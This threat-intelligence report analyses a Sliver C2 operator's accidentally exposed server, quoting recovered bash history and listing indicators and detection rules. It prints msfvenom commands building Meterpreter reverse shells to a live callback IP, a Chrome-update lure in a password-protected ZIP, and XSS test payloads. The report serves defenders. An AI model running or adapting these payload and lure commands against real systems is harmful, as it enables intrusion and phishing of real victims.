Category: Botnet (severity: high)
Investigated: March 7, 2026 | Published: March 7, 2026

Anatomy of an Accidental OPSEC Burn: A Turkish Sliver C2 Operator Exposes Their Entire Attack Infrastructure via Python HTTP Server

#botnet#phishing#social-engineering#c2#apt#spearphishing

TL;DR: A Sliver C2 operator at 213.142.148.166 accidentally exposed their entire home directory -- including .bash_history, .sliver/ configs, and generated payloads -- by running python3 -m http.server 8080 from /root. Forensic analysis of the recovered bash history reveals a Turkish-speaking intermediate-skill operator running Sliver C2, Metasploit Framework, and attempted OpenClaw AI botnet deployments, with social engineering payloads disguised as Chrome updates and Windows patches.


How We Got Here: An Open Directory That Should Not Exist

The investigation began with an open directory finding on 213.142.148.166:8080. Rather than a deliberately staged file drop or a misconfigured web server, this exposure was caused by the oldest mistake in the book: running Python's built-in HTTP server from a privileged home directory.

python3 -m http.server 8080 --bind 0.0.0.0

Executed from /root, this single command served the operator's entire working environment to the public internet -- bash history, SSH configuration, Sliver C2 database, Metasploit payloads, and every tool they had installed. The operator even opened the firewall for it:

ufw allow 8080/tcp

The recovered artifacts paint a detailed picture of the operator's tooling, skill level, and intended targets.
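The exposure above is trivial to spot from the outside: Python's built-in server titles every listing "Directory listing for ...", and the entry names tell you immediately whether a home directory is being served. The following is an added example (not code from the report) that parses such a listing and flags the kinds of entries recovered here; the HTML is a constructed sample shaped like the real listing format.

```python
# Added example (not from the original report): parses the HTML listing
# that python3 -m http.server emits and flags entries that should never be
# reachable from an internet-facing directory, such as the ones found here.
from html.parser import HTMLParser

# Names and suffixes that indicate an exposed operator home directory.
SENSITIVE = {".bash_history", ".ssh/", ".sliver/", ".sliver_backup/", "admin.cfg"}
SENSITIVE_SUFFIXES = (".exe", ".msi", ".zip", ".cfg", "_history")

class ListingParser(HTMLParser):
    """Collects <a href> targets and the <title> of a directory listing page."""
    def __init__(self):
        super().__init__()
        self.entries, self.title, self._in_title = [], "", False

    def handle_starttag(self, tag, attrs):
        if tag == "a" and dict(attrs).get("href"):
            self.entries.append(dict(attrs)["href"])
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def analyze_listing(html):
    """Return (looks_like_python_http_server, sorted sensitive entries)."""
    p = ListingParser()
    p.feed(html)
    is_py = p.title.startswith("Directory listing for")
    flagged = sorted(e for e in p.entries
                     if e in SENSITIVE or e.endswith(SENSITIVE_SUFFIXES))
    return is_py, flagged

# Constructed sample listing, shaped like what /root served on port 8080.
SAMPLE = """<!DOCTYPE HTML><html><head><title>Directory listing for /</title></head>
<body><h1>Directory listing for /</h1><hr><ul>
<li><a href=".bash_history">.bash_history</a></li>
<li><a href=".sliver/">.sliver/</a></li>
<li><a href="admin.cfg">admin.cfg</a></li>
<li><a href="kurulum.zip">kurulum.zip</a></li>
<li><a href="snap/">snap/</a></li>
</ul><hr></body></html>"""
```

Run against a fetched listing body, a non-empty flagged list is the signal to escalate the finding rather than file it as a generic open directory.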

Operator Profile

The bash history contains Turkish-language comments and file naming conventions that establish the operator's linguistic origin:

# DOĞRU DOSYA:          ("CORRECT FILE:")
# Terminalde ...         ("In the terminal...")
mv windows_kb5023789.zip kurulum.zip   # "kurulum" = "installation" in Turkish

The operator's skill level is intermediate at best. The history shows repeated failed attempts at basic tasks -- installing Sliver took at least four separate approaches (snap, apt, official script, manual binary download) before a working configuration was achieved. Port conflicts were resolved by brute-force kill -9 commands rather than systematic debugging. At one point, the operator attempted sudo kill -4098 PID, confusing a PID for a signal number.

Tool Stack: Sliver + Metasploit + OpenClaw

The operator deployed three distinct offensive frameworks on this server:

1. Sliver C2 (BishopFox)

Sliver was the primary C2 framework, though installation was a struggle. The history documents the full journey:

# Attempt 1: snap (failed)
sudo snap install sliver
snap run sliver        # doesn't work
snap run sliver-server # doesn't work
sudo snap remove sliver

# Attempt 2: official install script (failed - missing minisign)
curl https://sliver.sh/install | sudo bash

# Attempt 3: fix dependencies, retry script (unclear outcome)
apt install minisign -y
curl https://sliver.sh/install | sudo bash

# Attempt 4: manual binary download (success)
wget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-client_linux-amd64
chmod +x sliver-client_linux-amd64
sudo mv sliver-client_linux-amd64 /usr/local/bin/sliver-client

The operator eventually got the Sliver server running and configured it with:

  • gRPC listener on port 4443 (default Sliver server port)
  • Multiplayer port on 31337 (default)
  • Client config exported as /root/admin.cfg
  • Database backup at /root/.sliver_backup/

They also attempted to create a systemd service for persistence, but ultimately abandoned it in favor of backgrounding the server directly with sliver-server daemon &:

sudo nano /etc/systemd/system/sliver.service
sudo systemctl daemon-reload
sudo systemctl start sliver
# ... later abandoned:
sudo systemctl stop sliver
sudo systemctl disable sliver
sudo rm /etc/systemd/system/sliver.service

The backup of the .sliver directory followed by wiping the database suggests the operator hit corruption or configuration issues and performed a fresh start:

cp -r /root/.sliver /root/.sliver_backup
rm -rf /root/.sliver/database/*
rm -rf /root/.sliver/configs/*
sliver-server

2. Metasploit Framework

Metasploit was installed via snap and used for payload generation:

sudo snap install metasploit-framework
sudo snap connect metasploit-framework:network-control :network-control

Three payloads were generated (detailed in the Payloads section below).

3. OpenClaw AI Botnet (Failed)

The operator made three separate attempts to deploy the OpenClaw AI botnet:

# Attempt 1: /home/cy/clawdbot/
curl -fsSL https://openclaw.ai/install.sh | bash

# Attempt 2: same directory (after reboot)
curl -fsSL https://openclaw.ai/install.sh | bash

# Attempt 3: /root/clawbot/
curl -fsSL https://openclaw.ai/install.sh | bash

Between attempts 1 and 2, the operator performed an extensive cleanup -- stopping services, removing binaries, purging npm global packages, and sweeping filesystem paths:

sudo systemctl stop openclaw 2>/dev/null || true
sudo systemctl disable openclaw 2>/dev/null || true
sudo find / -maxdepth 4 -type d \( -iname "*openclaw*" -o -iname "*claw*" \) 2>/dev/null
rm -rf /root/.openclaw
rm -rf /usr/lib/node_modules/openclaw
rm -rf /tmp/openclaw-0
rm -rf /tmp/openclaw

The cleanup sequence suggests the operator installed OpenClaw, didn't like what it did to their system, removed it, and then tried again. The tool appears to be a Node.js-based botnet framework with a local API server on port 18789:

curl http://localhost:18789/

All three attempts appear to have failed or been abandoned.

Payload Analysis

Three distinct Metasploit payloads were generated, showing an escalation in social engineering sophistication:

Payload 1: payload.exe -- Basic Meterpreter

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=213.142.148.166 LPORT=4444 -f exe -o payload.exe

A plain reverse TCP Meterpreter shell. No obfuscation, no pretense. This was likely a test payload.

Payload 2: payload.msi -- MSI Installer Format

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=213.142.148.166 LPORT=4444 -f msi -o payload.msi

Same payload in MSI format -- potentially to bypass execution policies that block .exe but allow .msi installer packages.

Payload 3: chrome_update.exe -- Social Engineering Lure

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=213.142.148.166 LPORT=443 -f exe -o chrome_update.exe

This is the refined payload. Notable changes from the earlier versions:

  • HTTPS reverse shell on port 443 (blends with legitimate traffic)
  • Filename designed to impersonate a Chrome browser update
  • Password-protected ZIP for delivery, evading email gateway scanning:
zip --password "test" windows_kb5023789.zip chrome_update.exe
mv windows_kb5023789.zip kurulum.zip

The initial ZIP name windows_kb5023789.zip mimics a Windows KB update, which was then renamed to kurulum.zip ("installation.zip" in Turkish) -- suggesting the target audience is Turkish-speaking.
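The payload table above was built by hand from the recovered history, but the same extraction can be done mechanically. The following is an added example (not from the report) that joins backslash-continued lines, finds msfvenom invocations and pulls out the payload, LHOST, LPORT, format and output file; the history text at the bottom is a constructed sample built from the commands quoted above.

```python
# Added example (not from the original report): pulls msfvenom payload
# indicators (payload, LHOST, LPORT, format, output file) out of a recovered
# .bash_history so the File Indicators table can be rebuilt mechanically.
import shlex

def join_continuations(text):
    """Merge lines ending in a backslash into one logical shell command."""
    commands, buf = [], ""
    for line in text.splitlines():
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1] + " "
        else:
            commands.append(buf + line)
            buf = ""
    return commands + ([buf.strip()] if buf else [])

def parse_msfvenom(cmd):
    """Return a dict of indicators for one msfvenom command, or None."""
    try:
        toks = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in an unrelated history line
        return None
    if not toks or toks[0] != "msfvenom":
        return None
    rec = dict.fromkeys(["payload", "LHOST", "LPORT", "format", "output"])
    flags = {"-p": "payload", "-f": "format", "-o": "output"}
    i = 1
    while i < len(toks):
        if toks[i] in flags and i + 1 < len(toks):
            rec[flags[toks[i]]] = toks[i + 1]
            i += 2
        else:
            if "=" in toks[i]:  # LHOST=... / LPORT=... style options
                k, v = toks[i].split("=", 1)
                if k in rec:
                    rec[k] = v
            i += 1
    return rec

def payload_indicators(history):
    """All msfvenom payload records found in a bash history dump."""
    return [r for r in map(parse_msfvenom, join_continuations(history)) if r]

# Constructed sample history built from the commands quoted in the report.
SAMPLE_HISTORY = """msfvenom -p windows/x64/meterpreter/reverse_tcp \\
  LHOST=213.142.148.166 LPORT=4444 -f exe -o payload.exe
msfvenom -p windows/x64/meterpreter/reverse_https \\
  LHOST=213.142.148.166 LPORT=443 -f exe -o chrome_update.exe
zip --password "test" windows_kb5023789.zip chrome_update.exe
"""
```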

Reconnaissance Activity

The bash history reveals early-stage reconnaissance and XSS testing:

# Network sniffing
tcpdump -nn -i eth0 tcp and port 80
tcpdump -nn -i ens192 'tcp[tcpflags] & tcp-rst != 0'

# XSS testing against Google (testing technique, not targeting Google)
curl -v -H "User-Agent: test<script>" http://142.251.38.238
curl -H "User-Agent: test<script>alert(1)</script>" http://TARGET
curl -v -H "User-Agent: test<script>alert(1)</script>" http://google.com

The 142.251.38.238 IP resolves to Google infrastructure. The http://TARGET placeholder line was likely copied from a tutorial. This is not sophisticated XSS research -- it's someone learning reflected XSS from a guide and testing payloads against Google's front-end (which obviously sanitizes User-Agent headers).

Infrastructure Details

Server Environment

IP:        213.142.148.166
Services:  Sliver C2 (4443/tcp, 31337/tcp)
           Metasploit handler (4444/tcp, 443/tcp)
           Python HTTP server (8080/tcp)
Firewall:  UFW enabled, 8080/tcp explicitly allowed
Tools:     screen, tmux, htop, tcpdump, net-tools

The known_hosts Artifact

The recovered known_hosts file returned an HTTP 404 response rather than SSH host key data, indicating it was fetched through the Python HTTP server's directory listing but the actual ~/.ssh/known_hosts file did not exist at that path (or the .ssh directory was not being served). The authorized_keys file was similarly empty. This suggests the operator either used password authentication exclusively or had a non-standard SSH configuration.

Mysterious Artifacts

A few items in the history stand out without full context:

  • /root/fedora_ekrani.png ("fedora_screen.png") -- a screenshot the operator tried to view using eog and xdg-open, failing because there was no display server ($DISPLAY was unset). This is a headless VPS with no GUI.
  • /root/FLAT_CORMORANT -- a directory the operator briefly served on port 8000. "FLAT_CORMORANT" resembles a Sliver implant session name (Sliver uses ADJECTIVE_ANIMAL naming), suggesting this may have been a generated implant build directory.
  • autovm.sh and extend.sh in /home -- likely VPS provisioning scripts from the hosting provider.

MITRE ATT&CK Mapping

Technique                                          ID         Evidence
Command and Scripting Interpreter: Unix Shell      T1059.004  Extensive bash usage for tool installation, payload generation
Ingress Tool Transfer                              T1105      curl | bash install scripts, wget binary downloads
Application Layer Protocol: Web Protocols          T1071.001  Meterpreter reverse HTTPS on port 443
Masquerading: Match Legitimate Name or Location    T1036.005  chrome_update.exe, windows_kb5023789.zip
Archive Collected Data: Archive via Utility        T1560.001  Password-protected ZIP (kurulum.zip, password: test)
Exfiltration Over C2 Channel                       T1041      Meterpreter reverse TCP/HTTPS channels
Non-Standard Port                                  T1571      Sliver C2 on 31337, Meterpreter on 4444
Remote Services: SSH                               T1021.004  SSH daemon reconfigured (sshd_config edited)
Phishing: Spearphishing Attachment                 T1566.001  Payload disguised as Chrome update in ZIP
System Service Discovery                           T1007      systemctl list-units, systemctl list-unit-files

Operational Assessment

This operator is a real but unsophisticated threat. Key observations:

  1. Low OPSEC discipline. Running python3 -m http.server from /root as a file serving mechanism exposed the entire attack infrastructure. The password on the ZIP file was test. The firewall was opened for the HTTP server. Every mistake that could be made, was made.

  2. Tool-hopping indicates uncertainty. Three different C2/botnet frameworks (Sliver, Metasploit, OpenClaw) suggest the operator hasn't settled on a preferred toolset and is experimenting. The repeated failed installations reinforce this.

  3. Social engineering is the likely delivery vector. The progression from payload.exe to chrome_update.exe inside kurulum.zip shows the operator is investing effort in lure quality. Turkish-language naming targets Turkish-speaking victims.

  4. The infrastructure is still potentially active. The Sliver C2 daemon, Metasploit handlers, and the social engineering payloads all point to 213.142.148.166 as a live C2 callback address.


Indicators of Compromise

Network Indicators

Type   Value                            Context
IPv4   213.142.148.166                  C2 server, payload callback address
URL    http://213.142.148.166:8080/     Exposed open directory (Python HTTP server)
URL    https://openclaw.ai/install.sh   OpenClaw AI botnet installer
Port   4443/tcp                         Sliver C2 gRPC listener
Port   31337/tcp                        Sliver multiplayer listener
Port   4444/tcp                         Meterpreter reverse TCP handler
Port   443/tcp                          Meterpreter reverse HTTPS handler
Port   8080/tcp                         Open directory file server

File Indicators

Filename                 Description
chrome_update.exe        Meterpreter reverse HTTPS, LHOST=213.142.148.166, LPORT=443
kurulum.zip              Password-protected ZIP (password: test) containing chrome_update.exe
windows_kb5023789.zip    Original name of kurulum.zip before rename
payload.exe              Meterpreter reverse TCP, LHOST=213.142.148.166, LPORT=4444
payload.msi              Meterpreter reverse TCP (MSI format), same callback
admin.cfg                Sliver client operator config

Behavioral / Hunting Signatures

# Snort/Suricata: Outbound to known C2
alert tcp $HOME_NET any -> 213.142.148.166 [4443,4444,31337] (msg:"BREAKGLASS - Sliver/Meterpreter C2 callback to 213.142.148.166"; sid:2026030801; rev:1;)

# Sigma: kurulum.zip or chrome_update.exe on disk
title: Turkish Sliver Operator - Social Engineering Payload
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith:
      - '\kurulum.zip'
      - '\chrome_update.exe'
      - '\windows_kb5023789.zip'
  condition: selection
level: high

# YARA: Meterpreter reverse HTTPS with this C2
rule meterpreter_reverse_https_213_142_148_166 {
  strings:
    $ip = "213.142.148.166"
    $ua = "Mozilla/5.0" // default Meterpreter UA
    $mz = { 4D 5A }
  condition:
    $mz at 0 and $ip and $ua
}

STIX 2.1 Bundle (abbreviated)

{
  "type": "indicator",
  "name": "Sliver C2 Operator - 213.142.148.166",
  "pattern": "[ipv4-addr:value = '213.142.148.166']",
  "pattern_type": "stix",
  "valid_from": "2026-03-08T00:00:00Z",
  "labels": ["malicious-activity", "c2"],
  "confidence": 90
}

Investigation by breakglass.intelligence. Raw artifacts recovered from open directory exposure at 213.142.148.166:8080.
